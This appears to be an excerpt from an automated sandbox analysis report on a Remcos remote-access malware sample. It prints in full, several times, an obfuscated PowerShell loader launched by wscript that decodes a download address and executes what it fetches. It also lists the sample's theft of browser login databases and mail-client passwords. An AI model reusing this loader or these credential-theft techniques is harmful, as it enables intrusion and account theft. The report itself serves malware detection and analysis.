genbrupudnvnel:donnish/telefon/gambesm1esquire0aktiesm3nonrepa. pushie2spag um3 entome7simonio. digame8 cul ee6 mistan. ba oni2sawneba4porella7rodesbl/ clenchf boatsiropprioregraagaamandenklmbetonk,esexol glboghvediaf.rftegadipsybs calceit geodifeulcerog.electroxapp,ehesaf,rydsnholden ';$deutoxide=fyrstendmme 'valgets>bakteri ';$triangularize=fyrstendmme 'udfyldnimikalaseuforkorxreprodu ';$doozie='medansvaret';$bombestoppets = fyrstendmme ' ,ulbrieul,triccungr.sphforretnoafrett. pa.gene%becifreainex,repruelsenpcostaladcarabaoaalk,nettpja,tesafleshbr%tidtag.\ nonmitdsystemko lnra,mbekstraibscragglebudgettlparadeftcraniomrsrsynetuthiokoldclericiesecondin do torshamalds1avgusta4hildebo0a bejds.hugtandaskoleinfunreal.fserpent trillin&hilsene&b ngtow p.cocureinterfrctubi,olhartiumsoc onebr .ustulatunmetap ';illish (fyrstendmme ' pixm.p$gastroegtypot kl etreado trachob pse.doa hrynidl la.dsd:forsnkndmimicaleandalusb mirska,osmolat halefiestandtirdidrach= nati.n(genaabnc derre.msteer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'unblessed assimilerings silverrod cirsith200 bespake lucres galvanography medansvaret trommesalsmaleri badutspringene batwoman journalnummeret dobbeltkvartet clover coffeeroom calamiform urophobia kloakeringsomraaderne electroculture euphemist bjergmassivernes uhjlpeligste stalinismens telekommunikationens unblessed assimilerings silverrod cirsith200 bespake lucres galvanography medansvaret trommesalsmaleri badutspringene batwoman journalnummeret dobbeltkvartet clover coffeeroom calamiform urophobia kloakeringsomraaderne electroculture euphemist bjergmassivernes uhjlpeligste stalinismens telekommunikationens';if (${host}.currentculture) {$fightet++;}function fyrstendmme($aldersforskellens){$breddesekunder=$aldersforskellens.length-$fightet;$energi='substri';$energi+='ng';for( $standsforskellenes=7;$standsforskellenes -lt $breddesekunder;$standsforskellenes+=8){$unblessed+=$aldersforskellens.$energi.invoke( $standsforskellenes, $fightet);}$unblessed;}function illish($phagedaena){ . ($triangularize) ($phagedaena);}$opholdsstuernes=fyrstendmme 'ove,logmp sternostudentzb,throdibasommal,ovangslcopywria rbefol/aphidic5blokskr.overvaa0duarchy genrefo(reser,ewdistrusiosm.regnspacersdcert,fiopassiarwinterjespeckedi nydelignmontr ctanticle medinde1 overcr0elastom.un.erfo0renounc; topot. bia ricwtrimninijetsrunnlsdelfl6hovmodi4forrykk;nautica stra hsxsne ker6cohea.t4 theop.; prster selvcerentase v undres:undecor1fejlber2phyllos1martial.konkurr0fdevand)yawlers abiologfemkronevejrm.lckommandkbemyndio ti skr/vaaben.2 relati0 fanwr 1flugtni0gerning0analyse1udmanvr0sidetal1lin.les appo,ehfcyk lbaisamekhurcalioloemoa lesfrester o,estselxudsp ng/ aandev1 asiali2tubercl1,eperso. drydde0 fogf,u ';$sorteringens=fyrstendmme 'paakrveu antedas sjaelaevulkankr baga e-tjenesta.nderprgmemoryletelak cn ndtjentdesinfi ';$bespake=fyrstendmme 'arthrozh lat,setlaveslat genbrupudnvnel:donnish/telefon/gambesm1esquire0aktiesm3nonrepa. pushie2spag um3 entome7simonio. digame8 cul ee6 mistan. ba oni2sawneba4porella7rodesbl/ clenchf boatsiropprioregraagaamandenklmbetonk,esexol glboghvediaf.rftegadipsybs calceit geodifeulcerog.electroxapp,ehesaf,rydsnholden ';$deutoxide=fyrstendmme 'valgets>bakteri ';$triangularize=fyrstendmme 'udfyldnimikalaseuforkorxreprodu ';$doozie='medansvaret';$bombestoppets = fyrstendmme ' ,ulbrieul,triccungr.sphforretnoafrett. pa.gene%becifreainex,repruelsenpcostaladcarabaoaalk,nettpja,tesafleshbr%tidtag.\ nonmitdsystemko lnra,mbekstraibscragglebudgettlparadeftcraniomrsrsynetuthiokoldclericiesecondin do torshamalds1avgusta4hildebo0a bejds.hugtandaskoleinfunreal.fserpent trillin&hilsene&b ngtow p.cocureinterfrctubi,olhartiumsoc onebr .ustulatunmetap ';illish (fyrstendmme ' pixm.p$gastroegtypot kl etreado trachob pse.doa hrynidl la.dsd:forsnkndmimicaleandalusb mirska,osmolat halefiestandtirdidrach= nati.n(genaabnc derre.msteer
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'unblessed assimilerings silverrod cirsith200 bespake lucres galvanography medansvaret trommesalsmaleri badutspringene batwoman journalnummeret dobbeltkvartet clover coffeeroom calamiform urophobia kloakeringsomraaderne electroculture euphemist bjergmassivernes uhjlpeligste stalinismens telekommunikationens unblessed assimilerings silverrod cirsith200 bespake lucres galvanography medansvaret trommesalsmaleri badutspringene batwoman journalnummeret dobbeltkvartet clover coffeeroom calamiform urophobia kloakeringsomraaderne electroculture euphemist bjergmassivernes uhjlpeligste stalinismens telekommunikationens';if (${host}.currentculture) {$fightet++;}function fyrstendmme($aldersforskellens){$breddesekunder=$aldersforskellens.length-$fightet;$energi='substri';$energi+='ng';for( $standsforskellenes=7;$standsforskellenes -lt $breddesekunder;$standsforskellenes+=8){$unblessed+=$aldersforskellens.$energi.invoke( $standsforskellenes, $fightet);}$unblessed;}function illish($phagedaena){ . ($triangularize) ($phagedaena);}$opholdsstuernes=fyrstendmme 'ove,logmp sternostudentzb,throdibasommal,ovangslcopywria rbefol/aphidic5blokskr.overvaa0duarchy genrefo(reser,ewdistrusiosm.regnspacersdcert,fiopassiarwinterjespeckedi nydelignmontr ctanticle medinde1 overcr0elastom.un.erfo0renounc; topot. bia ricwtrimninijetsrunnlsdelfl6hovmodi4forrykk;nautica stra hsxsne ker6cohea.t4 theop.; prster selvcerentase v undres:undecor1fejlber2phyllos1martial.konkurr0fdevand)yawlers abiologfemkronevejrm.lckommandkbemyndio ti skr/vaaben.2 relati0 fanwr 1flugtni0gerning0analyse1udmanvr0sidetal1lin.les appo,ehfcyk lbaisamekhurcalioloemoa lesfrester o,estselxudsp ng/ aandev1 asiali2tubercl1,eperso. drydde0 fogf,u ';$sorteringens=fyrstendmme 'paakrveu antedas sjaelaevulkankr baga e-tjenesta.nderprgmemoryletelak cn ndtjentdesinfi ';$bespake=fyrstendmme 'arthrozh lat,setlaveslat genbrupudnvnel:donnish/telefon/gambesm1esquire0aktiesm3nonrepa. pushie2spag um3 entome7simonio. digame8 cul ee6 mistan. ba oni2sawneba4porella7rodesbl/ clenchf boatsiropprioregraagaamandenklmbetonk,esexol glboghvediaf.rftegadipsybs calceit geodifeulcerog.electroxapp,ehesaf,rydsnholden ';$deutoxide=fyrstendmme 'valgets>bakteri ';$triangularize=fyrstendmme 'udfyldnimikalaseuforkorxreprodu ';$doozie='medansvaret';$bombestoppets = fyrstendmme ' ,ulbrieul,triccungr.sphforretnoafrett. pa.gene%becifreainex,repruelsenpcostaladcarabaoaalk,nettpja,tesafleshbr%tidtag.\ nonmitdsystemko lnra,mbekstraibscragglebudgettlparadeftcraniomrsrsynetuthiokoldclericiesecondin do torshamalds1avgusta4hildebo0a bejds.hugtandaskoleinfunreal.fserpent trillin&hilsene&b ngtow p.cocureinterfrctubi,olhartiumsoc onebr .ustulatunmetap ';illish (fyrstendmme ' pixm.p$gastroegtypot kl etreado trachob pse.doa hrynidl la.dsd:forsnkndmimicaleandalusb mirska,osmolat halefiestandtirdidrach= nati.n(genaabnc derre.msteer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'unblessed assimilerings silverrod cirsith200 bespake lucres galvanography medansvaret trommesalsmaleri badutspringene batwoman journalnummeret dobbeltkvartet clover coffeeroom calamiform urophobia kloakeringsomraaderne electroculture euphemist bjergmassivernes uhjlpeligste stalinismens telekommunikationens unblessed assimilerings silverrod cirsith200 bespake lucres galvanography medansvaret trommesalsmaleri badutspringene batwoman journalnummeret dobbeltkvartet clover coffeeroom calamiform urophobia kloakeringsomraaderne electroculture euphemist bjergmassivernes uhjlpeligste stalinismens telekommunikationens';if (${host}.currentculture) {$fightet++;}function fyrstendmme($aldersforskellens){$breddesekunder=$aldersforskellens.length-$fightet;$energi='substri';$energi+='ng';for( $standsforskellenes=7;$standsforskellenes -lt $breddesekunder;$standsforskellenes+=8){$unblessed+=$aldersforskellens.$energi.invoke( $standsforskellenes, $fightet);}$unblessed;}function illish($phagedaena){ . ($triangularize) ($phagedaena);}$opholdsstuernes=fyrstendmme 'ove,logmp sternostudentzb,throdibasommal,ovangslcopywria rbefol/aphidic5blokskr.overvaa0duarchy genrefo(reser,ewdistrusiosm.regnspacersdcert,fiopassiarwinterjespeckedi nydelignmontr ctanticle medinde1 overcr0elastom.un.erfo0renounc; topot. bia ricwtrimninijetsrunnlsdelfl6hovmodi4forrykk;nautica stra hsxsne ker6cohea.t4 theop.; prster selvcerentase v undres:undecor1fejlber2phyllos1martial.konkurr0fdevand)yawlers abiologfemkronevejrm.lckommandkbemyndio ti skr/vaaben.2 relati0 fanwr 1flugtni0gerning0analyse1udmanvr0sidetal1lin.les appo,ehfcyk lbaisamekhurcalioloemoa lesfrester o,estselxudsp ng/ aandev1 asiali2tubercl1,eperso. drydde0 fogf,u ';$sorteringens=fyrstendmme 'paakrveu antedas sjaelaevulkankr baga e-tjenesta.nderprgmemoryletelak cn ndtjentdesinfi ';$bespake=fyrstendmme 'arthrozh lat,setlaveslat genbrupudnvnel:donnish/telefon/gambesm1esquire0aktiesm3nonrepa. pushie2spag um3 entome7simonio. digame8 cul ee6 mistan. ba oni2sawneba4porella7rodesbl/ clenchf boatsiropprioregraagaamandenklmbetonk,esexol glboghvediaf.rftegadipsybs calceit geodifeulcerog.electroxapp,ehesaf,rydsnholden ';$deutoxide=fyrstendmme 'valgets>bakteri ';$triangularize=fyrstendmme 'udfyldnimikalaseuforkorxreprodu ';$doozie='medansvaret';$bombestoppets = fyrstendmme ' ,ulbrieul,triccungr.sphforretnoafrett. pa.gene%becifreainex,repruelsenpcostaladcarabaoaalk,nettpja,tesafleshbr%tidtag.\ nonmitdsystemko lnra,mbekstraibscragglebudgettlparadeftcraniomrsrsynetuthiokoldclericiesecondin do torshamalds1avgusta4hildebo0a bejds.hugtandaskoleinfunreal.fserpent trillin&hilsene&b ngtow p.cocureinterfrctubi,olhartiumsoc onebr .ustulatunmetap ';illish (fyrstendmme ' pixm.p$gastroegtypot kl etreado trachob pse.doa hrynidl la.dsd:forsnkndmimicaleandalusb mirska,osmolat halefiestandtirdidrach= nati.n(genaabnc derre.msteer Jump to behavior
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerneer
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerc
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3372008001.0000000005855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerb
Source: wab.exe, 0000000A.00000002.3372008001.0000000005855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerz:
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerneerG
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerK
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr|
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerXX\N
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager7
Source: wab.exe, 0000000A.00000002.3372008001.0000000005855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerG:
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQ
Source: wab.exe, 0000000A.00000002.3372008001.0000000005855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager:x
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager`
Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager(x86)\windows mail\wab.exe
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager=
Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerneeru
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager|
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp, logs.dat.10.dr Binary or memory string: [Program Manager]
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_21362933 cpuid 10_2_21362933
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_21362264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 10_2_21362264
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 15_2_004082CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0041739B GetVersionExW, 14_2_0041739B
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3384711680.00000000210CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 1096, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: ESMTPPassword 15_2_004033F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 15_2_00402DB3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 15_2_00402DB3
Source: Yara match File source: Process Memory Space: wab.exe PID: 1096, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wab.exe PID: 5008, type: MEMORYSTR

Remote Access Functionality

barindex
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-SACUXX Jump to behavior
Source: Yara match File source: 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3384711680.00000000210CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 1096, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs